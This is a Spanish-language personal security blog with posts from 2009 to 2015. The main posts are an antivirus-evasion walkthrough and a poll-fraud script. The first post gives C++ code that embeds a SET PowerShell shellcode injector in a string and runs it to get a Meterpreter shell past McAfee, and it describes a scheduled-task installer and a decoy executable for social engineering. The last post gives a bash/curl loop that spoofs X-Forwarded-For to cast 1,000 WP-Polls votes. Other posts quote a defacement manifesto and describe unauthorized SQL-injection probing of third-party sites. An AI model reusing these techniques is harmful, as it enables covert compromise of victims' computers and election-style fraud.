Mostrando entradas con la etiqueta Informatica. Mostrar todas las entradas
Mostrando entradas con la etiqueta Informatica. Mostrar todas las entradas

viernes, enero 30, 2015

Evadir antivirus para utilizar Setoolkit, powershell y meterpreter

Después de otro buen tiempo sin escribir por acá, vengo con algo sencillo, nada del otro mundo, pero que a mas de alguno le puede servir.

No voy a entrar en detalles sobre las herramientas en si, puede encontrarse bastante información en google sobre SETOOLKIT (social-engineer toolkit), para generar un código que se ejecute en la máquina víctima haciendo uso de la powershell y alphanumeric shellcode injector y que nos devuelva una consola meterpreter desde donde podemos controlar fácilmente y extraer información de una computadora víctima, el caso es que hasta hace un tiempo éste método era indetectable para los antivirus, el archivo de texto generado (x86_powershell_injection.txt) podía hacerse .bat y luego ocupar una herramienta para hacerlo ejecutable y que se viera bonito haciendo uso de ingeniería social, pero... al parecer los antivirus ya se están actualizando y aunque se trata de un archivo de texto plano (.txt), Mcafee específicamente interceptaba dicho archivo aún siendo txt que no representa por si solo, ninguna amenaza.
Aún, haciéndolo .bat y luego convirtiéndolo en .exe, el antivirus era capaz de interceptarlo en el directorio temporal al momento que el .bat se corría. Lo interesante del caso es que, si copiaba el contenido del archivo de texto al portapales, abría una consola y lo pegaba, el código se ejecutaba sin que el antivirus se mosqueara.

Luego de hacer varias pruebas y leer un rato encontré una solución que tenía toda la lógica del mundo: hacer un pequeño programa para consola en C++ que copiara el contenido del archivo de texto y que luego lo fuera pegando caracter por caracter en una consola y posteriormente lo ejecutara (además de hacer un autoinstalador ejecutable que agregue nuestro archivo a las tareas programadas y que se ejecute a diario a la hora especificada y muestre además un archivo ejecutable real para seguir con nuestra ingeniería social), así que probé dicha solución pero de igual forma, al desempaquetarse mis archivos, incluyendo el x86_powershell_injection.txt, el antivirus lo eliminaba y el programita daba un error al no encontrar el archivo de texto plano... así que a éste punto, la solución que se me ocurrió fue mas fácil aún: hacer que el programa, en vez de leer el contenido del txt y que luego lo pegara en una consola, mejor eliminaba el archivo de texto del camino, copiando su contenido en una variable dentro del mismo programa y luego pegar dicha variable en la consola para su ejecución y listo... el antivirus no se da cuenta qué es lo que pasa y corre nuestro exploit.

Código propuesto por OneHappyTaco en iNinjas:

#include "stdafx.h"
#include
#include
int main(void)
{
std::ifstream infile("FILE_NAME_HERE");
char ch = ' ';
std::string inString;
while (infile.get(ch))
inString += ch;
system(inString.c_str());
return 0;
}

(Además que con ésta propuesta también es necesario empaquetar unas dlls) Podemos ver que el código lo que hace es leer nuestro archivo de texto caracter por caracter y lo guarda en una variable que luego pasa a la consola.

Y éste es mi código propuesto y que al momento corre sin que salte el antivirus, en lugar de tener mi archivo de texto, hay que copiar y pegar el contenido del archivo de texto en la variable "cadena":

#include "stdafx.h"
#include int main(void)
{
std::string cadena;
cadena="ContenidoDeTuArchivo-x86_powershell_injection.txt";
system(cadena.c_str());
}

... Y listo, tenemos nuestro ejecutable que nos devuelve la powershell deseada.


Saludos!!!


lunes, enero 06, 2014

Cicada 3301

Aunque me he retirado un poco de la escena de seguridad IT, siempre sigo suscrito y leyendo (un tanto mas de lejos y con tiempo mas relanciado) y pues por ahí ni me di cuenta de ésto que tuvo lugar en el 2012 y el 2013, igual, no es que tenga los conocimientos en éstas áreas (steganofría y criptografía) como para haber resuelto toda ésta locura, pero siempre me es muy interesante leer al respecto y ver todo como se fue dando y resolviendo, mas aún cuando también se ha dado por 3er año consecutivo hoy en en 2014.

Pero de qué estoy hablando???
Hablo de Cicada 3301, algo que parece ser una serie de pruebas basadas en conocimientos de criptografía, esteganografía, programación, sistemas y esas hierbas, si... algo como esa serie de retos sobre seguridad informática que han habido, pero ésta vez elaborado de una manera bastante peculiar.

Todo comenzó a inicios del 2012 con una imagen y un mensaje:


Hola.  Estamos buscando individuos altamente inteligente.  Para encontrarlos, hemos ideado una prueba.
Hay un mensaje escondido en ésta imagen.
Encuéntralo, y te guiará en el camino para encontrarnos.  Esperamos reunirnos con los pocos que encontrarán el camino.
Buena suerte
3301
Y así daba inicio la serie de pruebas una tras otra, ingeniosas y bien elaboradas.  Se desarrollaron algunos canales de IRC y foros al respecto para ir resolviendo grupalmente las pruebas, pero al final se le pedía que la última prueba se resolviera individualmente... aunque claro, siempre se filtraron los últimos correos pero ya no hay mas información sobre los "pocos que encontraron su camino".

Por ahí encontré un wiki que va recopilando la información sobre Cicada 3301 y ya comenzó a hacerlo para las pruebas de éste año, para efectos educativos a los que les gusta el tema, no está demás darle el seguimiento.

Mientras todavía no se resuelven las dudas:
- Reclutamiento para qué?
- Quiénes están reclutando?

Lo cierto es que el método utilizado ha sido pensado para tentar a los mejores donde más fácil se hace para una mente inquieta como los analistas de seguridad: curiosidad.

Hasta donde lleva el agujero del conejo?

Saludos!!!

Qué pasó en el 2012 (Parte 1) - Inglés
Qué pasó en el 2012 (Parte 2) - Inglés

Qué pasó en el 2013 (Parte 1) - Inglés


jueves, marzo 08, 2012

Estas seguro de estar seguro? (Chrome cayó primero)

Recién me entero de la noticia sobre los resultados del concurso Pwn2Own y resulta que este año el primero en caer en 5 minutos fué Chrome (el año pasado fue Safari), la empresa Vupen fue la que lo logró aunque ellos mismos confirman que trabajaron por 6 semanas buscando las vulnerabilidades utilizadas y hacer los exploits respectivos, la primera parte es para evitar la proteccion DEP y ASLR de win y la otra parte para salir del sandbox de chrome y que ellos se enfocaron en Chrome deliveradamente... me resulta muy interesante lo que Vupen menciona al respecto:


“Esto demuestra que cualquier navegador, o cualquier software, puede ser hackeado si hay suficiente motivación y habilidad”.
Nos comenta el maligno al respecto que la forma de comprobar las cosas en dicho concurso es haciendo que sin intervención del usuario, simplemente al ver una página web en el navegador, se ejecute la calculadora de windows, demostrando que practicamente puede ejecutar cualquier otra cosa.


Exploits 0 day, listas privadas compartiendo vulnerabilidades, empresas que venden dichas vulnerabilidades al gobierno... y tu realmente estas seguro de estar seguro con tu navegador?.... piensalo de nuevo.


Saludos!


martes, marzo 06, 2012

Pandalabs comprometida...

Asi es, después de todo un día donde la noticia ha sido que varios integrantes de LulZsec fueron entregados por colaboración de su propio lider quien colaboró con el FBI, la reacción no se ha hecho esperar y esta vez fue el turno de Pandalabs, quien, además de un deface masivo tuvo un intrusión bastante seria a juzgar por la información publicada en el mismo index defaced donde se pueden ver accesos de teamviewer, logmein, login de windows y varios usarios y passwords, tambien se menciona que se han colocado backdoors en el antivirus...

hello friends!
pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has earning money working with Law Enforcement to lurk
and snitch on anonymous activists. they helped to jail 25 anonymous in different countries and they were actively participating
in our IRC channels trying to dox many others. Aside how clueless they are and how disgusting they look sucking police tiny dicks
and even how much fun we got when they are trying to sell IT security services xD that only helps to endanger people even more; 
they contribute to bring activist to jail. activists, not even hackers. common people who are trying desperately to denounce 
the injustices happening on their countries right now.
we should just say:

Aún a esta hora todavia se puede ver el deface... definitivamente, esta es la era de la cyberguerra...

Saludos y a ver si pandalabs saca algún comunicado oficial...

OWNED HARD

cybercrime.pandasecurity.com
antivirus-offers.pandasecurity.com
blog.cloudantivirus.com
cloudofficeprotection.pandasecurity.com
cloud.pandasecurity.com
cloudpartnercenter.pandasecurity.com
cloudprotectionbeta.pandasecurity.com.tar.gz
cloudprotection.pandasecurity.com
facebookfriends.pandasecurity.com
forgetsecurity.co.uk
forgetsecurity.co.za
forgetsecurity.es
go.pandasecurity.com
info.pandasecurity.com
information.pandasecurity.com
lavuelta.pandasecurity.com
maintenance.pandasecurity.com
momentos.pandasecurity.com
ondersteuning.pandasecurity.com
pandacompetition.pandasecurity.com
pandalabs.pandasecurity.com
prensa.pandasecurity.com
press.pandasecurity.com
promo.pandasecurity.com
protectyourfamily.pandasecurity.com
research.pandasecurity.com
securitytothecloud.pandasecurity.com
serviciospro.pandasecurity.com
servicos.pandasecurity.com
suporte.pandasecurity.com
techcenter.pandasecurity.com
uninstall.cloudantivirus.com
wiki.cloudantivirus.com
www.cnccs.es
www.forgetsecurity.de
www.forgetsecurity.se


viernes, marzo 02, 2012

Huy, soy un pirata??!!! (De nuevas leyes y cierres de webs)


Algunas leyes ya han sido aprobadas, otras se encuentran en proyecto esperando aprobación, lo cierto es que la finalidad es la misma: "Proteger la propiedad intelectual ante todo" - "Eliminar la piratería", o al menos es la forma en que se les ha vendido la idea, inclusive se ha publicado una lista de sitios que serán los primeros en enfrentarse a estas leyes (ver imagen superior gracias a elotrolado.net).

Vimos el caso de Megaupload que fue "clausurado" por, entre otras cosas "infracción de derechos de autor" sin importar que había gente que tenía sus archivos personales y había pagado por dicho servicio, otras webs han cerrado por temor a represalias en su contra.

El caso es que estas leyes obedecen a factores de poder y control en la red, hispashare ha hecho un recuento bastante bueno sobre como funciona la Ley Sinde y me llama la atención el siguiente párrafo:
"Bueno, pero esto irá contra páginas que ganan mucho dinero, ¿no?
Ni siquiera es necesario que ganen algo de dinero. El reglamento aclara que se podrá dirigir el procedimiento contra un responsable de un servicio de la sociedad de la información tanto si actúa con ánimo de lucro como si no. En este último caso se pide que haya causado un daño patrimonial al titular de los derechos “o sea susceptible” de causarlo, lo que es una formulación lo suficientemente genérica como para dar cabida a prácticamente cualquiera."
Hablando con alguien me decía que estaba bien que cerraran Megaupload porque ya era reconocido que distribuían mucha piratería, aunque no eran ellos directamente sino los usuarios, ellos estaban al tanto de lo que pasaba...

Estoy de acuerdo?... hmmm.... si y no.... si hablamos de la piratería per sé, es muy probable, pero la forma de proceder es la que sienta un mal precedente. Según el párrafo anterior, si yo subo una imagen, video, musica a mi web porque me gustó y quise compartirla con todos ustedes, me hace eso un pirata?, alguien puede sentirse ofendido y me puede demandar haciendo que mi web cierre simplemente porque si, sin exponer el caso ante un juez sino ante una "comisión" y me dan un par de dias para que elimine el contenido, pero igual, si lo borro, implicitamente estoy aceptando que he cometido el delito, asi que ya quedo en la lista negra aunque no haya querido lucrarme subiendo esa imagen/audio/video, el simple hecho de subirla bastaría para considerarme como pirata.

Que es pirateria entonces?
Segun la pagina luchacontralapirateria el concepto es, sin haber una definición " legal":
"todo acto de violación del derecho de autor, bien sea por la obtención y distribución de copias sin la previa autorización expresa del autor, o bien por la comunicación pública y puesta a disposición de contenidos de manera ilegal. Igualmente la introducción de mercancía pirata a un territorio. Tal circunstancia puede comprender la violación de derechos morales y patrimoniales."
Bajo ese concepto, no importa si obtienes lucro o no, si lo compartes, eres pirata (Si, yo también pensaba que siempre y cuando no buscara hacer plata de esto, no era pirata). Si lo publicas o facilitas su obtención, eres pirata... hmmm estoy ya se pone feo no? quien va a querer publicar algo en su web y que lo llamen pirata y se haga "delincuente", si en tu facebook compartes un video/canción de Youtube, eres pirata, si posteas un link o algun usuario de tu web deja en un comentario un link y tu no lo quitas, también eres pirata.

Estarían estas medidas erradicando la "piratería" realmente?
Hispashare ha dado un aviso y en un parrafo menciona lo siguiente:
"HispaShare no incumple la ley de propiedad intelectual, no aloja ningún tipo de archivo, tampoco enlaza a archivos, no es más que un directorio que recopila elinks, con ellos un programa permite a particulares ponerse en contacto para intercambiar información. Es decir, ni un solo byte de esos archivos pasa por nuestra web. Nuestra intención nunca ha sido dañar al cine por lo que no permitimos elinks de “screeners” (películas grabadas en salas de cine) y la gran mayoría de títulos de nuestra página están descatalogados de modo que sería imposible conseguirlos en tiendas o videoclubs. En cuanto al cine español, si lo pagamos con nuestros impuestos, debería ser de dominio público."
Hmmm... según la denifición "no legal" de piratería, ha puesto a disposición pública contenidos de manera "ilegal", asi que sí, también son piratas... pero entonces Hispashare pone el siguiente párrafo como medida:
"Cread una cuenta de usuario en HispaShare.com: de este modo podremos ponernos en contacto contigo. También podría ocurrir que cerráramos la página al público y la convirtiéramos en privada de modo que únicamente puedan acceder los usuarios registrados."
Ok, si soy pirata por hacer "publico" los enlaces, si hago mi sitio privado (Incluyendo "disclaimers" como se hacía antes?) entonces dejaría de ser un pirata?

Parece una medida fácil de efectuar... o fácilmente podemos volver a los canales privados de IRC y de igual forma se pueden compartir los contenidos sin temor a represalias, también esto es fácil no? Pero, si las medidas son "fáciles", será que los que promueven estas leyes no se han dado cuenta de ello o yo me estoy perdiendo en algún vacío "legal"?

Cuánto de lo que hoy sabes lo aprendiste en internet? En mi caso... la gran mayoría, solo piensa que si esto sigue así todo ese conocimiento podría no estar a tu disposición... te afecta esto?

El internet ha sido desde sus inicios un lugar donde la información fluye libremente.... y ese creo que ha sido el problema para los grandes, mas que solo la "piratería", el internet está fuera de su jurisdicción, fuera de su "control"... por mas que lo han intentado no lo han conseguido... simplemente el internet es de todos y para todos y estoy convencido que seguirán intentando regular/restringir lo que fluye por estos cables que nos llevan conocimiento, pero hay muchos mas que peleamos porque siga siendo como fue desde un inicio: Libre!


Y tu... eres pirata?


lunes, febrero 27, 2012

Hacking de Aplicaciones Web: SQL Injection

No, no, no y no... este blog no está muerto aunque algo pálido, sigue con vida, lamento mucho estar tan ausente, la verdad si que me hace falta escribir por aca, pero como el tiempo ya no lo hacen como antes, pero ahi vamos.


Esta mañana me encuentro con la nota de Chema sobre un libro que a mas de alguno le va a parecer mas que interesante, necesario de tener y es que para hablar sobre el tema, nadie mejor que "el maligno".  Los dejo con parte de la publicidad del libro en Informatica 64:


"Visto lo visto, no es de extrañar que los programas contengan fallos, errores, que, bajo determinadas circunstancias los hagan funcionar de forma extraña. Que los conviertan en algo para lo que no estaban diseñados. Aquí es donde entran en juego los posibles atacantes. Pentesters, auditores,... y ciberdelincuentes. Para la organización, mejor que sea uno de los primeros que uno de los últimos. Pero para la aplicación, que no entra en valorar intenciones, no hay diferencia entre ellos. Simplemente, son usuarios."


Así que sin mas, les dejo el enlace del post de Chema y el link para adquirir el libro:


Salud!!!


jueves, agosto 25, 2011

Steve Jobs renunció...



Si, finalmente... Steve Trabajos, que, aunque no se ha dicho explicitamente, se cree fuertemente que por motivos de salud, renunció.

La noticia ya se puede leer en varios lugares de internet:



Un hombre bastante emblemático, siempre se le vió vestir sus jeans, camisa negra y tenis. Visionario, tomador de riesgos (aventado, como diríamos...), que llevó a Apple a un lugar de respeto entre las compañías de informática, sigue la pregunta si Apple será capaz de mantenerse, muchos dicen que si, muchos lo dudan, lo cierto es que Steve Jobs forma parte de la historia de la informática.


martes, agosto 16, 2011

Happy Debian Day!


Hoy cumple años mi querido sistema operativo y como todos los años se celebra a nivel mundial, veremos si hay algo para SV!

Saludos y happy Debian Day!!!

miércoles, julio 06, 2011

Otra tanda mas de sitios vulnerables SQL injection

Y bueno... como mencioné en mi post anterior.. continué con mis auditorias ad-honorem y encontré otro desarrollador de paginas webs que también tenía sus sitios vulnerables a SQL, algunos blind, otros SQL en su estado natural ;) pero el caso de este último proveedor es que los sitios afectados son en su mayoría televisoras y radios streaming nacionales entre otras organizaciones y empresas. Ayer mismo por la noche di el respectivo aviso a la empresa desarrolladora y a un cliente, todavia a esta hora no recibo respuesta de ninguno... asi que bueno, a ver que tal.

El caso es que ya se hacen muchos sitios web que estan ahi simplemente siendo vulnerables... que tanto se está tomando en serio la seguridad a la hora de desarrollar un sitio web? cuanto script kiddie no hay por ahi buscando la oportunidad de hacer "defaces"... ya no se hace tan raro verlos realmente...

Un saludo y buxos programadores!!!

martes, mayo 31, 2011

Mas sitios con SQLi in the wild

Tiempo ha, reportaba varios sitios de una misma empresa desarrolladora de páginas web que eran vulnerables tanto a SQLi como a BSQLi, el caso es que alguien en el FB tiraba una pregunta sobre desarrolladores de páginas web y ahi salían varias opciones de desarrolladores... que maña la mía y es que como decían por ahi, no se quitan las ganas de andar poniendo una comilla por ahi, por alla, and 1=0 etc. etc. etc. el caso es que lamentablemente encontré un desarrollador y muchos sitios desarrollados afectados tambien por ambos casos SQLi y BSQLi, comencé a hacer las pruebas respectivas y creo que casi (todos?) los sitios desarrollados eran vulnerables y dije lamentablemente, porque en realidad son muchos sitios y el desarrollador resultó ser un conocido mío, no quise seguir viendo hasta donde mas llegaba el hilito, pero seguro se descosía toda la camisa, así que después de determinar las metodologías de explotación sin mas, le avisé, creo que tomará un buen tiempo (si es que se hace, usualmente ya no se invierte mas tiempo en clientes antiguos -logicamente por falta de recursos-) en que estos sitios sean sanitizados como es debido. Espero luego y con mas tiempo hacer otro par de auditorías "ad-honorem" a otros desarrolladores para ver que encontramos... Saludos y ojo con sus variables!!!

martes, mayo 10, 2011

BackTrack 5 Codename Revolution

Este día se está liberando la ya muy conocida distribución linux orientada a pruebas de intrusión e (in)seguridad informática, bajo el nombre código Revolution.

Siempre siendo Open Source, con soporte para 32 y 64 bits... ahora tambien para arquitectura ARM, con escritorios KDE, Gnome y Fluxbox.

Definitivamente tienes que descargarlo si estas en la scene...

BackTrack 5 - Penetration Testing Distribution from Offensive Security on Vimeo.



http://www.backtrack-linux.org/

jueves, abril 14, 2011

Honeypots...

Según la Wikipedia...
Se denomina honeypot al software o conjunto de computadores cuya intención es atraer a atacantes, simulando ser sistemas vulnerables o débiles a los ataques. Es una herramienta de seguridad informática utilizada para recoger información sobre los atacantes y sus técnicas. Los honeypots pueden distraer a los atacantes de las máquinas más importantes del sistema, y advertir rápidamente al administrador del sistema de un ataque, además de permitir un examen en profundidad del atacante, durante y después del ataque al honeypot.
Y también tomado de mi lectura matutina, acá les dejo el post de La guarida del Mal explicando como hacen un honeypot de lo mas básico usando Netcat (realmente... es una navaja suiza en informática!) Saludos!

Milw0rm y Inj3ct0r se fusionan en 1337db

*Post xpress*

Esta mañana leía en hackplayers sobre la fusión de Milw0rm e Inj3ct0r, dando origen a 1337db que de seguro será una mayor y mejorada base de datos de exploits... así que, ahi les dejo el dato!

Saludos!

viernes, febrero 25, 2011

Curso C# con Mono


No... este blog no ha muerto... ha estado un tanto dormido, pero no muerto... lo que pasa es que su servidor ha estado metido en una y mil cosas personales, este año ha sido un año de cambios muy drásticos en mi vida.


Pero bueh, dejando a un lado el comercial personal, solo quise pasar la voz de una entrada que lei en barrapunto sobre un curso de C# con Mono, dado por la gente de linuxhispano.net, el curso puede ser accedido desde AQUI, la forma en que se está dando es a través de entradas en el blog, asi que es un curso-online-blog.


El curso se ve bastante bonito y además los muy buenos comentarios y respuestas de la gente que está publicando el curso, que pueden irte aclarando muchas dudas.


Así que ya sabes... si te interesa y buscas alguna solución que te ayude a ser multiplataforma tus proyectos y siguiendo la línea libre, ahi puedes comenzar!


Saludos!

martes, septiembre 14, 2010

Software Freedom Day El Salvador 2010

Este sábado 18 de septiembre se estara celebrando ek Día de la Libertad de Software (Software Freedom Day - SFD).

Se estara celebrando en el ITCA Santa Tecla, a partir de las 9:00am, habran conferencias, demostraciones, instalaciones, stands de las diferentes comunidades, etc... asi que por ahi nos vemos!!!

Mas informacion.

Web challenges from RootedCON'2010 CTF

A los que siempre andan buscando wargames de seguridad, por aca les va una buena noticia... RomanSoft, ya conocido por varios en este inframundo ha dado la noticia que el proximo 17 de Septiembre estara publicando un wargame con pruebas, que, como el mismo Roman comenta, son "puramente web aunque con un toque más moderno", algunas ya realizadas en el RootedCON pasado, pero ahora fortificadas/modificadas...

El proceso de inscripcion ya esta abierto, asi que para los interesados, el link de este nuevo wargame que de seguro me mantendra jugando varias noches, no dudando de la calidad del mismo...

Saludos y a desvelarse!!!

Aahhhhh claro, se me olvidaba... hay premio para el ganador: Un Ipod Touch 4G!

domingo, agosto 29, 2010

DLL Hijacking... desde hace 10 años?

Ya hay varios blogs y listas de correo hablando sobre el tema, yo no hablaré sobre él, ya hay un par de blogs que tienen buena información al respecto, lo cierto es que no es una vulnerabilidad nueva, pero que ha tomado realce/publicidad gracias a una herramienta hecha publica para encontrar aplicaciones vulnerables.

A informarse y todos aquellos que utilicen windows, a estar listos y desconfiar (como siempre...).

Los enlaces:

Dll Hijacking: otra forma de explotar aplicaciones en windows

Windows en estos dias, mucho mas inseguro que nunca

Toda la verdad sobre DLL Load Hijacking


Saludos!

jueves, marzo 11, 2010

Proxima charla sobre Hacking etico y SQL Injection

Saludos desde el mas acá...

Después de un par de días perdido y conciente que les debo la entrega de blind sql injection, por acá les traigo una noticia para los interesados, estaré dando una charla en la UNICO (UNICAES?), un poco de Hacking ético, auditorías de seguridad pero el tema específico serán la inyecciones sql, comenzando por lo basico hasta llegar a las inyecciones a ciegas. El día tentativamente es el sabado 20 de Marzo, la entrada será gratuita, así que en cuanto tenga la seguridad del día se los haré saber.

Saludos!

jueves, noviembre 26, 2009

Apple y yo...

No, no estaba muerto... solo andaba de parranda.
Muchas cosas han pasado ultimamente con mi vida... esta es una de ellas...

Si algo no podemos negar es la increible creatividad y diseño que ha caracterizado a Apple y sus macs.

Allá por el año 1996 tuve mi encuentro cercano con una Mac. Mauricio era quien en ese entonces tenía su negocito y varias computadoras (todas mac) en las cuales jugabamos en red Quake, Descent, Nascar, Carmagedon...
Fue con el que pusimos lo que para mi sería mi primer negocio, gracias a el comencé en esto del diseño gráfico, todo a pura mac, en ese entonces era una de 266 mhz trabajando photoshop, se defendía mejor que las 533mhz intel de ese entonces, claro, mac se jactaba de ser 2 veces mas rapido que una intel, y realmente... lo era, claro eran mucho mas caras ya que también utilizaban la tecnología SCSI, era un hardware realmente potente.

Diferencias y detalles hicieron que cerráramos ese negocio que iba bastante bien, cada quien tomó su camino y es ahi donde luego comenzamos Artes Silicon Digital (ahora ASD) con Salvador y Erick (si, ziggy el carajada) y en ese entonces compramos algo de lo mejorcito en ese entonces de mac, ya era tiempo de las imacs tipo cascos, con sus flamantes colores de frutas, diseño revolucionario y excelente desempeño, pero no... no fuimos por una de esas, fuimos por una graphite de 400 mhz, diferente a todas las demas, luego el carajada compraría una imac color aqua.

Imac graphite 400

Ese había sido mi ultimo encuentro con apple... hasta que salió el iphone, tenía que tener uno... al ver lo hermosos que son y la cantidad de aplicaciones que habían, tenía que tener uno, pero algo que también ha caracterizado a Apple ha sido su elevado precio, muy alejado de mis posibilidades, sin embargo Regino tuvo a bien cambiarme su iphone por me Treo 750... y al fin tenía mi iphone, mac me volvía a tocar.

El iphone, sus aplicaciones y su mercado hicieron que se me metiera que quería aprender a programar para él (había que rebuscarse para ver de donde podía obtener ingresos por todo el ambiente que esta pasando la empresa para la que -aun- laboro), lamentablemente el SDK solo corre en mac, asi que después de hacer pruebas con maquinas virtuales y versiones MacOS para intel que corrían pero demasiado lentas... tenía que comprarme una mac para poder lograr este objetivo.

En octubre nos indemnizarona todos en la empresa así que, de nuevo, previendo lo que espero hacer con las aplicaciones iphones, necesitando una computadora para diseño 3D, animaciones y video, he vuelto a ser macintouched -touched by macintosh ;-)- me compré una Imac de las nuevas versiones, siguen siendo de un diseño increible, irónicamente ahora tienen procesador Intel (recordemos el video...), pero aún así, el hardware tiene un excelente desempeño, superior a una pc normal. Si, se que por el precio que pagué podía tener una PC con mejor capacidad, pero, necesitaba una combinación entre el ambiente para el SDK de iphone y capacidad de hardware, asi que fue la combinación perfecta.

El bootcamp de mac hace facil la tarea de montarle gnu/linux... Claro, ya está en proceso de su liberación siendo "Debianizada"... siempre quise esa combinación: Hardware mac y mi querido Debian.

Aun estoy peleando con algunos detalles para poder exprimir cada detalle, me falta tiempo para poder dejar mi Debian "de toque" pero ahi vamos, la "manzana" ahora forma parte de mi laboratorio.


Lamentablemente... no todo fue color de rosa... estoy bastante molesto con la gente de la macstore galerias (macstore4), pero muy agradecido con la gente del taller tecnico... pero, ese es otro post.

Saludos!

sábado, octubre 10, 2009

Votando mas de lo permitido con WP-Polls


WP-Polls es un plugin de WordPress para administrar encuestas, nunca lo he utilizado, simplemente quiero apuntar a lo fácil que es saltarnos la seguridad que tiene de no permitirnos votar mas de una vez por IP, pudiendo votar fácilmente las veces que se deseen, por lo que este plugin no debería ser utilizado para encuestas que se desean tener datos reales ni mucho menos para concursos...

Según pude ver, gracias al plugin x-forwarded-for spoofer para firefox, al cambiar el valor de la cabecera http x-forwarded-for, me permitía votar de nuevo... de que estoy hablando? bueno, pueden encontrar mas información sobre esta cabecera http en wikipedia, en resumen diremos que esta cabecera lleva tu ip local, por ejemplo, varios de los proveedores locales de internet hacen que varias personas salgan a internet a través de una misma IP, por ejemplo, por una misma IP está accediendo el Sr. Perez a la página de su periódico favorito pero tambien está Maloso Juarez queriendo entrar por fuerza bruta a la página de administración del mismo periódico... los administradores del servidor del periódico andaban vivos y se dieron cuenta del ataque de Maloso Juares, así que deciden bloquear la IP publica de Maloso Juarez, que resulta ser también la del Sr. Perez, resultando en que el Sr. Perez no puede disfrutar de su lectura porque fue bloqueado "sin querer".

X-forwarded-for entonces no toma en cuenta la IP publica, sino la IP local... ejemplo, la IP publica del Sr. Perez y Maloso Juarez era 200.13.X.X, pero la ip local que les está asignando el router de cada casa es del tipo: 192.168.0.1, que es la IP que lleva la cabecera X-Forwarded-for.

Esto solo fue un ejemplo, claro en la vida real si estoy sufriendo un ataque bloqueo la IP, no importa quien mas quede afectado, solo quise ilustrar la diferencia de IPs.

Volviendo al X-forwarded-for, al ser una cabecera HTTP enviada por el cliente (nosotros), tenemos control completo sobre que enviar y que no, ya sea con el plugin mencionado anteriormente, algún proxy... o a pie.

Ya que descubrimos que WP-Polls unicamente verifica la dirección que viene detallada en la cabecera x-forwarded-for, entonces podemos engañarlo (IP spoofing), nos podemos entonces hacer un pequeño script bash, tenemos pues que verificar primero que variables son las que enviamos por post, para el caso WP-Polls normalmente son las siguientes:

vote=true&poll_id=1&poll_2=2&rndval=12321321321323

Bastará con identificar los valores para la opción que necesitamos, y nos hacemos nuestro script bash haciendo uso de curl,

... antes de ponerlo, hay que aclarar que en x-forwarded-for podemos poner cualquier numero y dara igual... es decir, bien puedo poner rangos reales de IP: 192.168.0.1-254, IP inventadas: 955.278.8000.6... o numero cualquiera.

ahora si.. el script:

-----------------------------
#!/bin/bash
NUM=0

#solo vamos a agregar 1,000 votos
while [ $NUM -le 1000 ]; do

#generamos un numero random para ponerlo como parte de nuestra IP
RAN=$RANDOM

# $1 indica un argumento pasado desde la linea de comandos (ver uso despues)
# $RAN es nuestro numero random generado anteriormente
# $NUM es el numero correlativo de nuestra votacion
# -H es utilizado por curl para enviar cabeceras HTTP
# -d es utilizado por curl para indicarle las variables que tiene que enviar por POST
# ademas crea un archivo con la respuesta obtenida (para saber si el voto fue efectivo)
# lo cual puede omitirse si no quieres ver un monton de archivos..
#
# Nuestra IP la forma con el argumento que le pasemos,
# el numero random y el numero correlativo
# ej. si le pasamos el argumento "200.13"
# le agrega un numero random quedando "200.13.454545"
# y luego le agrega el correlativo quedando "200.13.454545.1"
# lo que hara algo dificil que se repita ;)

curl -H "X-Forwarded-For: $1.$RAN.$NUM" -d "vote=true&poll_id=1&poll_2=2&rndval=$RAN" "http://sitio_con_WP-Poll/" >log_$1.$RAN.$NUM.html

let NUM=$NUM+1
done
-----------------------------

Lo guardamos con cualquier nombre, por ej "wp", y lo ejecutamos pasandole un argumento para hacer aun mas flexible nuestra IP...

wp "200.13"

Y ahi va nuestra votacion...

Cabe mencionar que no he verificado versiones ni mayor detalles de este plugin...

Saludos!